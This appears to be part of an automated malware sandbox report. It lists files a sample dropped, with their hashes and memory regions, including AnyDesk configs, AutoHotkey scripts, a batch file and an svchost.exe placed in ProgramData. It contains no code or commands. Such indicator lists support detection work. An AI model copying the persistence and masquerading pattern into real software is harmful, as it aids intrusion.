| SHA512 | b846dce3ed1814e17b4f1a43910589e752e2ac911132d18275ff4d179796f1e7928a32636327a681d7c01edd704bec2efc8a12692597205bb334895c9063ceb3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | cd8941c283368fdea191591520c1ce98 |
| SHA1 | bb997399bb22654c56b55423b64e278323e7f8e4 |
| SHA256 | 43bedeb6be4ce388c8ea52dd891d1da06b001a5ea1d87b78b64d92e656a40cce |
| SHA512 | 43badda618bfae86a37d7ab3732e4a2c428a0841929917e9deaad702d4e5d96caba807ac899f62a263001c04d90500acb725f6e62f3636cf5a6c292b4e480e5a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 0a0ecde2b94a66e3a9fa302827adc582 |
| SHA1 | 8a5cb9761d7ecb9043b263f3059c533ff9262a83 |
| SHA256 | c943800edb7fbcffd7d0a433ade7295357c7696019b32fc489d21588588a51c0 |
| SHA512 | f2467ee33e7a63cd51f908ee78b54e59ef4f5d9e1b628ead6e0cd1ecee42faee8fa0c418d117ea4a8009948b582a47f9083ad284d107b206ab09f2cb0a866f8d |
memory/3076-210-0x0000000001000000-0x0000000002749000-memory.dmp
C:\Users\Admin\AppData\Roaming\locked.exe
| MD5 | 6d97d6c2be27f7633da8432a5f90ccd2 |
| SHA1 | 5ffca0110e122848b772e563f74c057d7f782664 |
| SHA256 | 47b78d957e366dbf484d44bca911f41a7a795309e0d3e4c9d08fdc135efbb77a |
| SHA512 | 518e5678a7631258f2373d7f76987f668531e972e04d5bdbdf8aacb2e2a568af618b1e4f338a289edf11e419cc6b4813e95c4433e0e849243d10e10a895cbfce |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\Origins\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 420f7797b20e51d5475e48fdabccb317 |
| SHA1 | ff5b8d73d5f92178323e1b98d81cb63044ec0ddb |
| SHA256 | c5cbfebe0406933bbd0d606531cdac52da34971fbc57a47cd2db69c9a5518d7f |
| SHA512 | 4bde82e36655b381efc06f5dc65f94ce03285b4591e1e2a0c1c5a66704429c97d0223caf9d577a01a3b8daa35ae38bb82d2d476a8002eb228f0963b068a439c1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
| MD5 | 6e0bf738cbaedcefe89657bcf3b66a1b |
| SHA1 | b0c1f595068d868e7c2bdabb4ea75963bc7708bb |
| SHA256 | 2a64a979acf50c51172b60560d825cea6f932bdc9eb1b919f0bc4c8356fb2f63 |
| SHA512 | 696af10d741a06fab41bbc513c2e6ab0a19cd8b0c5b190e945b6b89d78245ec88291e334da4ca9388dd6a4128c55bccb8df0c044ff796fad42962adf46390c66 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
| MD5 | 74dc1d90d76ba60f62d639506fd3f748 |
| SHA1 | 3e6266c453d4af4504bd63727443d05e63ccdbee |
| SHA256 | d15cb075896e02fd9290105068493d4257bbca3bf880359aa079c8f2b8c700e9 |
| SHA512 | 2f47c017863e33e20b7fd7670e9f3a6204c700b5c350f8c819f342b4fbf9a820cb69f4a0c5237767684606bde3082dc59a52527b50d4f518cee3e7eedaabc2c5 |
memory/2912-418-0x0000000001000000-0x0000000002749000-memory.dmp
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | a787c308bd30d6d844e711d7579be552 |
| SHA1 | 473520be4ea56333d11a7a3ff339ddcadfe77791 |
| SHA256 | 8a395011a6a877d3bdd53cc8688ef146160dab9d42140eb4a70716ad4293a440 |
| SHA512 | da4fcf3a3653ed02ee776cfa786f0e75b264131240a6a3e538c412e98c9af52c8f1e1179d68ed0dd44b13b261dc941319d182a16a4e4b03c087585b9a8286973 |
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | cd2e715d5bc31088faee792c16c6224c |
| SHA1 | 996a3199e875b96f1e5d14e55fa400994ab70820 |
| SHA256 | ba407614e4434ab1447edea9a7b09f8d00bf793090d88f2229640d2dc4815030 |
| SHA512 | ede8ba49a23ba2a17700b29620b9f48e6796b5c458b706fc2953ed9a09f23ae77cf4a554f84e56ae99c70cb24124d1df2592dbaa362dab91f5343f9a2ef8807d |
memory/4312-429-0x0000000001000000-0x0000000002749000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4E36.tmp\4E37.tmp\4E38.bat
| MD5 | 4c8f4515dd2087309a35099fe2fffa35 |
| SHA1 | e75acce86a90f2996dc28a1de705cb708d753b37 |
| SHA256 | 90a8a7ffa3265396f7d69509ef5652ef8bc69e241d4b63cdeca1baee1fa1fea6 |
| SHA512 | 8699e45bf3ae83d60f913dcad302dfb8de3267cdb1fe6fa8813ea9c7c2c54d9b8bc9798dbcdcf9f1c4438f06226bf5e036a421d66892e9447722f434d08aa1d9 |
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | 074789fcde08a8d7ef66f56db1d4c79d |
| SHA1 | 3618c00b9c03c8c2928b3d84e3d8ae9c5207fcce |
| SHA256 | 77a561b8289538bbd86f051bf11b56f6db06e7413e1ab7c9e309af1cbafbfa01 |
| SHA512 | f2677c53f105238101852c4ef438143f0a5d774e22427092e801e034e61819d9e0abd4286ae9413b72d66b75b99ea16214873a90b2f44a094bead52d65c08ec0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
| MD5 | 4db71229d9b8851ce476e5b740e2efa1 |
| SHA1 | e89212b1fc3b80fde3b7e4d409a19977284be381 |
| SHA256 | 10d2aa15655b9aa5630f937091372757d91da3a650d8014220d594221494da6c |
| SHA512 | 3fa35c99416d4c5da232db65db78ff7e0134fda46c03b8a5917db723ac3eb4a5c1da7625ef99e50d7ce4554ac8f50fc1095839558ae80eeded6b7d414f465eed |
C:\Users\Admin\AppData\Roaming\AnyDesk\service.conf
| MD5 | f576ec4f49619ee9f30409a2cd1cd1cc |
| SHA1 | 61e9afddb79c51e2fceb28e244f6c002293e66dd |
| SHA256 | 539d6eb2e249ab534631dc5e06cf01e983d660f4817a7b784c4496cb97adaa27 |
| SHA512 | 1a4d49c1e5d09eec6e75afdff6b2d25dd7b0e8f5111acf84d8c4c022cbd473b67a1e87b8910daaecdb92b4d48abb1d504a80d0b9dacdd74fbb06923134f41ad6 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | 901b8f86741a197aa363655942a94353 |
| SHA1 | 5f8483511177b7cbd632c2ac4a5593d97969bb1d |
| SHA256 | 1f21a3a357306cfeff555f8457f148a8c51d5570f2feff24d1300a39d7dc34cc |
| SHA512 | 76e3d8555503e55ab4c22e70963ab0e9927375d6538c1ffd7288c23c78ac534e3a2a99c77d6e42f18a9dc8a86c35adff6d942f1058b66b9a722089f0bb669c6d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
| MD5 | aad7a35c634d43f49b5c32ca6bf73923 |
| SHA1 | da5c4f353a22d751c1d968bf437ba182a425df8a |
| SHA256 | 16ff0d7d04b6e27348e072095647cb07cc6728e72dd6d7a4bdac1e8b34a9b2df |
| SHA512 | a9df11ab24aeb90d9d6f38331ac7a4aed47839c41c0647775bea3ccb46147879f29374f896368fe794ec6f5c63f550238faa3882192117f7488457ef02076268 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 714600962166f30daff78a8764424715 |
| SHA1 | aeef6adb164e6e70e80f8e2215f2b66bbc1ac584 |
| SHA256 | b775be4a9ac37d08c92b28d556d73100083cc43bcecc2ca354e417b8bf64f92b |
| SHA512 | e1798ee72e393086fc1f590834052ca9cb6d27981b8db3d71e9590b9159ce0b930db27864e7e50902672eaac0f87b69e708460624368a7b6e2d58fb760343f18 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | e752cde9ed351e888051a306010c6d91 |
| SHA1 | 1bd56a07145effab53145c30319877b4e53b2512 |
| SHA256 | 25b09562071dd2513ccc15a09699b003df84f1ea49668a8e5412c682bff00fb5 |
| SHA512 | 48ec3886ac65b00317295440ce4d3451466c5d0aa6984802ba22f8bbd83b4887cd20a275f4fc0f43d23996b744128cf95307ff7f57c31ef28d679c802fad3409 |
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | 2feb8517f6c8de4badf080ef58806c08 |
| SHA1 | f3a17dc81fddef2112ac14aa231e331d98a1d74f |
| SHA256 | c415047e1a4b1bdfc983bbfaacc0ca921ce5c088ee84531e90dcc407f8dab545 |
| SHA512 | 6dd85868bc6d5cf0dee648daf96abcbe3a5d59c9673e1783ccacadc0b8cd52a4dab83098d66db250d7538012d5552ee2d296fa9380cd34e77d5a1d402410bcb0 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | f6ad53f0c4b54c29b742135932cfdf9f |
| SHA1 | ed513e316796c36319db48eb4b21ee59fb38d1ba |
| SHA256 | 69a6853263cd7d91125f9aee7b304cd9c8285601ee63f339672340ac6d71e9b9 |
| SHA512 | df35e29fec41bcfac86ab52e1114333675ba05c40658f743474518d53dfbc8e635cb41726975b935ebb89f5e8b16e3a819918fb465fab24e9290529e71d9fb10 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | df3ae74e58a39c5d52cd7ec8a5561a15 |
| SHA1 | 7186e6394343e9b17917b1b3274b85983db3f1ca |
| SHA256 | fbe28b1a4eed41ef762f8ac84e23420893d6611c7aae3fa3042579316b8308e5 |
| SHA512 | 161815b5bd452a397f8d11dd35411f18ff0e483d51d6bb94279c2c8f028518579dd104011e2a09abaff8e1f392ff78e9a1ae5ed9e97cb2c9a9d050d698f18f61 |
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
| MD5 | 2d0600fe2b1b3bdc45d833ca32a37fdb |
| SHA1 | e9a7411bfef54050de3b485833556f84cabd6e41 |
| SHA256 | effdea83c6b7a1dc2ce9e9d40e91dfd59bed9fcbd580903423648b7ca97d9696 |
| SHA512 | 9891cd6d2140c3a5c20d5c2d6600f3655df437b99b09ae0f9daf1983190dc73385cc87f02508997bb696ac921eee43fccdf1dc210cc602938807bdb062ce1703 |
C:\Users\Admin\AppData\Roaming\doorbell2.ahk
| MD5 | d61c68849186eb9dbea169cceb79c2a6 |
| SHA1 | baca62e884a3d7dccae18ef64096db4d562def39 |
| SHA256 | 6c4daf8ef0da2cf0ac079637a5c3062a610c4c710c7e4c55eedd1b010337bb1e |
| SHA512 | deec0d4cb912d64db281459e8d01b21583fd7df3c46ea02cb66fffb5378ac6e1f375cb18f30ddccd908fc0c98d14094ea1620699f93498fc8c7be579a3a5d0b0 |
memory/4312-656-0x0000000001000000-0x0000000002749000-memory.dmp
memory/2912-658-0x0000000001000000-0x0000000002749000-memory.dmp
memory/264-671-0x00007FF6E8A70000-0x00007FF6E8B68000-memory.dmp
memory/264-673-0x00007FFE5EDD0000-0x00007FFE5F084000-memory.dmp
memory/264-680-0x00007FFE70490000-0x00007FFE704A1000-memory.dmp
memory/3076-670-0x0000000001000000-0x0000000002749000-memory.dmp
memory/264-684-0x00007FFE5D440000-0x00007FFE5D640000-memory.dmp
memory/264-687-0x00007FFE608B0000-0x00007FFE608D1000-memory.dmp
memory/264-691-0x00007FFE60830000-0x00007FFE60841000-memory.dmp
memory/264-690-0x00007FFE60850000-0x00007FFE60861000-memory.dmp
memory/264-689-0x00007FFE60870000-0x00007FFE60881000-memory.dmp
memory/264-688-0x00007FFE60890000-0x00007FFE608A8000-memory.dmp
memory/264-685-0x00007FFE62150000-0x00007FFE6218F000-memory.dmp
memory/264-681-0x00007FFE5D640000-0x00007FFE5E6EB000-memory.dmp
memory/264-679-0x00007FFE722E0000-0x00007FFE722FD000-memory.dmp
memory/264-678-0x00007FFE70550000-0x00007FFE70561000-memory.dmp
memory/264-692-0x0000020DBFA80000-0x0000020DC1230000-memory.dmp
memory/264-677-0x00007FFE70720000-0x00007FFE70737000-memory.dmp
memory/264-676-0x00007FFE709C0000-0x00007FFE709D1000-memory.dmp
memory/264-675-0x00007FFE70A70000-0x00007FFE70A87000-memory.dmp
memory/264-674-0x00007FFE70E50000-0x00007FFE70E68000-memory.dmp
memory/264-672-0x00007FFE70A90000-0x00007FFE70AC4000-memory.dmp
memory/3144-693-0x0000000000020000-0x0000000001769000-memory.dmp
C:\ProgramData\AnyDesk\system.conf
| MD5 | afdc4f69f4720b8c4153f6186f49a2b6 |
| SHA1 | 329c27ea36d7913809b0c239bb58e91d2ee468ac |
| SHA256 | 9a218849d74b0ca75ef719b0cab59b40529b958097eb0b0b8527b09bc293a571 |
| SHA512 | 3a8a6e1994a681a12875b820eb7ca78b6c035a1489c4d8648590424dbec3152e6831ac0c4a73560968231c9b45db869dad189109fb1ecb4a3159258e0099a7de |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 2358feea6e3047d074858e60ad9c331e |
| SHA1 | 5dc3487d68f72ce38f5ecbf72c96d52285449ff4 |
| SHA256 | d79ff400d528f8b37f943f2de4056eced03da8a54fef281cdb6a75189b28820f |
| SHA512 | 6c90aa18eb9db6e948a1217b19a15ebf99579981117c507534d82ae0a8ca92a7c21e4472fb23613b0d2e74a34cf37024216e73f014d3d1ae870dd08a396c615f |
C:\ProgramData\AnyDesk\system.conf
| MD5 | 40d237533cb59d734960dd0cf4fd59bc |
| SHA1 | fc2397dd67ff6a3dbf190bb367f24e19d11cb6b7 |
| SHA256 | 7e19c138e7e0ff3e9e7f32edf42897283298e0a1c9178955b09353df4ad2923d |
| SHA512 | 470d7f8051d4df12ff5bea04c1e43ebff0d58d27ca568f21ad60912ac8748b3d1689bae510bbd71e8f5892825f6fe7972267bc56d8d021a35c2892789dacc63d |
C:\Users\Admin\AppData\Roaming\doorbell.ahk
| MD5 | 952ea1033b5f83c25ce5133944e4a65d |
| SHA1 | 9f50c5a2fb4aee93d154758c66d9ca81fd5fe3c5 |
| SHA256 | 163b07a09d117ff1bdeb20ed83c1ebfb0917ce72ec63d32b4b6f8f87902f604a |
| SHA512 | b500ceadee155d4f5e39348e205ce8339605732e82564545c04c9ac2a718ea7135fdc37ee8b3f60d035d26fae114022f04efd57e2cc9feb1231e18051c307785 |
memory/3076-778-0x0000000001000000-0x0000000002749000-memory.dmp
memory/3440-780-0x0000000000020000-0x0000000001769000-memory.dmp
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | f45c4f891e3642f27e828dbe8a6a5007 |
| SHA1 | 97886a5556c24600bdb8d698811160241f699a06 |
| SHA256 | fcab6eb6a005752a137f96e5a31b19219a768610f99f82e47635e8a2cfb0095b |
| SHA512 | 8d3f19138d3bb51701eba80cd9c7480446e34b643fb93ca39c3629080acb302a0eb19b921cbd862911969a184ebf9647d3d39fd20519ffb9af58c0691cf4e6a9 |
C:\ProgramData\AnyDesk\service.conf
| MD5 | 18cb654a8ec88c2d015323d92a845527 |
| SHA1 | 42809cac12aa907b5c465c2ec53cc46edd285a2c |
| SHA256 | d9088f0b76f2a4fd6ad2bf04797190d17c010f1f905486c66af38c29c9b5ee00 |
| SHA512 | cf5359c3452f6c0ed21e59814b59fb9707476163bbdfdaca1eb4c999b999b4adfd3457b507a5444c35b5c7ad1a3481156d5476b504d086dd48400b4ea92ed180 |
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | 2b0c64a868da3798e7c8a4ad4b7baf85 |
| SHA1 | d7805e6bcbd25b08b6075555851a83c94a0752fa |
| SHA256 | 644ac848f0297ef79f196485b12941502f56aeab1ec2f238f7c817e1dca4fff3 |
| SHA512 | a66838415b060c6d889f85d92bd0d0bc9da0d77067c67eb419e3eb71c36e309d4a5eb5eef0f33ae0c9260a2a3afe96354ca650ccce55c90d2cfce55a4c1f1a13 |
memory/5432-781-0x0000000000020000-0x0000000001769000-memory.dmp
memory/3440-800-0x0000000000020000-0x0000000001769000-memory.dmp
memory/264-811-0x00007FFE5D640000-0x00007FFE5E6EB000-memory.dmp
memory/5216-821-0x0000000000020000-0x0000000001769000-memory.dmp
memory/5216-825-0x0000000000020000-0x0000000001769000-memory.dmp
C:\ProgramData\svchost.exe
| MD5 | 1b0a49b12fb2cfc89d01cf29b8d4f875 |
| SHA1 | 2bbf873025c5c95f030de72a8a68d5d2e7b23c3b |
| SHA256 | b6ed5fdbece483fba8c67c52efbc57d77e126b032bd031f4bf68224f5c96459e |
| SHA512 | 94844cbf5c3995d3d719c5d77d1c1ab3a02269d3fbd2ef1822e301bc96441976d53b169ac982015804d28fdb1e52efc59604fed0c90bb196511f70039947fe86 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\Paths\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\c24721e5-b19e-4093-846e-78f389865b7b.dmp
| MD5 | de7df9579e13e38167b2e078687413e4 |
| SHA1 | 0911da3b618c2c3a6346c9fd36eacde88f50dea8 |
| SHA256 | c57656e621479d2d91063c23f97ad30b33f8f69582aacfa6278e8e2c08773f1a |
| SHA512 | b77de1fa61966e9de9a97f1f8768556d274a6a26f79381f0c4225fe208225c222841e5b1318cdf3471cc2b71355c7b9bff4e7a4f6ca5473c0ce7578ebe246444 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 446dd1cf97eaba21cf14d03aebc79f27 |
| SHA1 | 36e4cc7367e0c7b40f4a8ace272941ea46373799 |
| SHA256 | a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf |
| SHA512 | a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf
| MD5 | 195281d0310e89c66e805e3d396cc405 |
| SHA1 | 4c7c9347adf0e533e22ffe41916d355e810dcf86 |
| SHA256 | e7ace78afc7ff9f19d5f613e21cc1726e988ff2cdaab95a9eaae0241294597ed |
| SHA512 | adb865b0b2cc45cf7eb6349edf9ab5abf9f05c8d17e4d686df5873b081e7637e5fbccfce0b9f9bd72b697229f6e3f1fbfa868e1c9e7c5820dd38f64bda8b7d99 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf
| MD5 | d7ec70d758c05c4e87a6b44997059454 |
| SHA1 | c38b0ab9ee963b7538e40555ae1c23d42fc52014 |
| SHA256 | 26129039c586ef79963b2154a298f4597afade2352336a26f64581e6c1dd92fb |
| SHA512 | 8d43a5cd4187f1a6523ce7fd4ce8a1e08a0f60b1530d815974bc6299467a5d1b81314ea49ca98d2bc3538bb4dbcb5cdd37a6390614858e81e0788aa74fad99db |
C:\ProgramData\gcapi.dll
| MD5 | 1ce7d5a1566c8c449d0f6772a8c27900 |
| SHA1 | 60854185f6338e1bfc7497fd41aa44c5c00d8f85 |
| SHA256 | 73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffaf |
| SHA512 | 7e3411be8614170ae91db1626c452997dc6db663d79130872a124af982ee1d457cefba00abd7f5269adce3052403be31238aecc3934c7379d224cb792d519753 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 54160121e764adf94e7026b6b029beef |
| SHA1 | 2f84fd895c201baf26ed547f755da31d8ba9ec33 |
| SHA256 | 435f54cf446bbd26101553a28976fcea917721f3cbc58fa572dc7e8670e9017a |
| SHA512 | e18eba2b02b901e9e639b6b8049263a07d070684d70223c69a72d57d53273feee3db56251fc2c05214c4620497b6064e61e53d7ff0b5ca038fe89d1bab9bcb23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 60ce81492cab862af6ee70db77d16edc |
| SHA1 | d8b0537eb770773ecd59b56cdb09b8f477f6b8a6 |
| SHA256 | 1bd50858a21311638b34d3246e20a1c05052b46b23287787e86109d48205f5e9 |
| SHA512 | 75c312048117f067d5a9b9228c705a1788ae053216e697d5ca29cb2d362e9d59ffcdc2e3ebe287fceda43d7dc716b958a60dfd07e8d7cfc16abdcf27f11de951 |
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | 9f1f669adf38dc7aac121097a6fefbc4 |
| SHA1 | 43f093810fe475447be2578aa9caa611ee153cc3 |
| SHA256 | d528d0b4464f23c01f04383e32b3e7965fb6998a4894c34ef26cea0e0ffa6dc9 |
| SHA512 | 0431990bd92aa46551eca3f5b82e4b9cf235e73ac00a8a256c39d50eb4629aaa19668cf4426e00f7875f0c8525a420a8746c8a39a7414bb5e632c4ed029126b1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old
| MD5 | 7a46fcdc398b5cc1bd45b8881683a191 |
| SHA1 | 8d6f8bf457ef5333118ecddc81fe7936ca1228fc |
| SHA256 | 75759dc7b94f2399a82cd369363783d9b11d17da26d24f1d1366eb344671586e |
| SHA512 | 191a9edc963693868909da4cdf8ba7e00f0be9b2a83f9a561ca240ad2c1eb7d55cc8577e9884145e1c6ab15c95f3ad97d555e83d4ac77261b7cbbc5e2af5f236 |